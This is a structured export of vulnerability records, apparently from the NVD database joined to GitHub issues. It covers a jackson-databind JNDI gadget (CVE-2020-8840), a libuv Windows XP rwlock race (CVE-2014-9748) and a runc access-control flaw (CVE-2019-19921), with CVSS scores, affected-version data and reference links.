"https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220%40%3Cdev.kafka.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1%40%3Cjira.kafka.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200327-0002/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2620" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220%40%3Cdev.kafka.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1%40%3Cjira.kafka.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a%40%3Cdev.ranger.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200327-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F87CF67-6994-43F1-BEC3-DD7D122D0146", "versionEndExcluding": "2.7.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF323F3D-B2A4-41E7-94F9-5539C9B7025E", "versionEndExcluding": "2.8.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B316C68-EEEF-436D-9570-907CAC8F0507", "versionEndExcluding": "2.9.10.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "matchCriteriaId": "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "matchCriteriaId": "7081652A-D28B-494E-94EF-CA88117F23EE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:huawei:oceanstor_9000_firmware:v300r006c20:*:*:*:*:*:*:*", "matchCriteriaId": "99FB89BE-A430-4540-B1B5-5F8458E79AF2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:huawei:oceanstor_9000_firmware:v300r006c20spc100:*:*:*:*:*:*:*", "matchCriteriaId": "0AA58161-B5CA-44CE-B16B-A09D86CB7A9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:huawei:oceanstor_9000_firmware:v300r006c20spc200:*:*:*:*:*:*:*", "matchCriteriaId": "DBC5C81D-495A-432B-A3A8-B208BB2270F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:huawei:oceanstor_9000_firmware:v300r006c20spc300:*:*:*:*:*:*:*", "matchCriteriaId": "066EEFAA-917D-40BF-8D92-AE8CBEC0312D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:huawei:oceanstor_9000:-:*:*:*:*:*:*:*", "matchCriteriaId": "AEC54023-CF84-4095-A3E8-2D6E334768E9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", "versionEndExcluding": "11.2.0.3.23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFD43191-E67F-4D1B-967B-3C7B20331945", "versionEndExcluding": "12.2.0.1.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.2.0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "062C588A-CBBA-470F-8D11-2F961922E927", "versionEndExcluding": "13.9.4.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.9.4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2620
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget (*) type reported related to JNDI access. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-8840 Original discoverer: @threedr3am Fixed in: * 2.9.10.3 (`jackson-bom` version `2.9.10.20200223`) * 2.8.11.5 (`jackson-bom` version `2.8.11.20200210`) * 2.7.9.7 * does not affect 2.10.0 and later
Block one more gadget type (xbean-reflect/JNDI - CVE-2020-8840)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2620/comments
6
2020-02-09T22:50:59Z
2020-07-16T17:23:57Z
https://github.com/FasterXML/jackson-databind/issues/2620
562,253,349
2,620
1,079
CVE-2014-9748
2020-02-11T17:15:11.780
The uv_rwlock_t fallback implementation for Windows XP and Server 2003 in libuv before 1.7.4 does not properly prevent threads from releasing the locks of other threads, which allows attackers to cause a denial of service (deadlock) or possibly have unspecified other impact by leveraging a race condition.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libuv/libuv/issues/515" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libuv/libuv/pull/516" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodejs/node/pull/2723" }, { "source": "cve@mitre.org", "tags": null, "url": "https://groups.google.com/forum/#%21msg/libuv/KyNnGEXR0OA/NWb605ev2LUJ" }, { "source": "cve@mitre.org", "tags": null, "url": "https://groups.google.com/forum/#%21topic/libuv/WO2cl9zasN8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libuv/libuv/issues/515" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libuv/libuv/pull/516" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodejs/node/pull/2723" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://groups.google.com/forum/#%21msg/libuv/KyNnGEXR0OA/NWb605ev2LUJ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://groups.google.com/forum/#%21topic/libuv/WO2cl9zasN8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libuv:libuv:*:*:*:*:*:*:*:*", "matchCriteriaId": "9BC7386D-7909-47FB-9B43-E02D9B01A16F", "versionEndExcluding": "1.7.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:*:*", "matchCriteriaId": "E3527F41-A6ED-437D-9833-458A2C60C2A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:microsoft:windows_xp:-:*:*:*:*:*:*:*", "matchCriteriaId": "B47EBFCC-1828-45AB-BC6D-FB980929A81A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "matchCriteriaId": "91D770B4-E1AB-40F6-A9FC-88E0FE860C81", "versionEndExcluding": "0.10.46", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "matchCriteriaId": "90D7908B-0B23-4CC4-9585-0120DF187A47", "versionEndExcluding": "0.12.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.12.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/libuv/libuv/issues/515
[ "Patch", "Third Party Advisory" ]
github.com
[ "libuv", "libuv" ]
It was pointed out by Zhou Ran that the fallback write mutex can end up getting unlocked by a different thread than the one that locked it, resulting in undefined behavior. Consider a rwlock that is initially unlocked: Thread A: increments reader count at t0 -> acquires write lock at t0 -> decrements reader count at t2 Thread B: increments reader count at t1 -> decrements reader count at t3 -> releases write lock at t3 See also https://github.com/nodejs/node/pull/2723
windows: xp rwlock fallback is unsound
https://api.github.com/repos/libuv/libuv/issues/515/comments
2
2015-09-07T13:02:14Z
2015-09-11T09:50:26Z
https://github.com/libuv/libuv/issues/515
105,211,877
515
1,080
CVE-2019-19921
2020-02-12T15:15:12.210
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
